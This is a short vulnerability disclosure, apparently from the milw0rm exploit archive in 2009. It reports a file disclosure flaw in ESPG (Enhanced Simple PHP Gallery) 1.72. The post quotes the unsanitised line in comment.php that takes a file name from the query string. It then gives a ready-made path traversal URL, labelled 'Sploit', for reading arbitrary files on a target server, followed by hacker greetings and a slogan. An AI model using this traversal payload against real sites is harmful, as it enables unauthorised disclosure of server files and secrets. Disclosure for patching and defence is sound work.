.::ESPG 1.72 File Disclosure Vulnerability::.
=> Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72
=> Vendor: http://quirm.net
=> Download: http://quirm.net/download/21/
=> Bugfounder: bd0rk
=> Contact: bd0rk[at]hackermail.com
=> Greetings: str0ke, TheJT, Maria, Alucard, x0r_32
=> Vulnerable Code in comment.php line 3
-------------------------
$fileid = $_GET['file'];
-------------------------
[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php
###The 20 years old, german Hacker bd0rk###
=> 'GAINST WAR IN ISRAEL AND GAZA!!! <=
# milw0rm.com [2009-01-18]